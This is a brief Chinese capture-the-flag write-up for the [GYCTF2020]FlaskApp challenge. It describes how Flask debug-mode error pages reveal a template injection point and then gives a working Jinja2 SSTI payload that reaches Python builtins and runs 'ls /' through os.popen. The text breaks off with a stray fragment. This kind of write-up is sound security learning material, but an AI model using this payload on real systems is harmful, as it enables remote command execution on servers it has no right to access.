[GYCTF2020]FlaskApp
官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。
debug模式的情况下可以抛出详细异常信息
base64解密界面随意输入字符串,导致解码报错
提示存在ssti注入
flask模板注入框架
查看根目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{
{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
</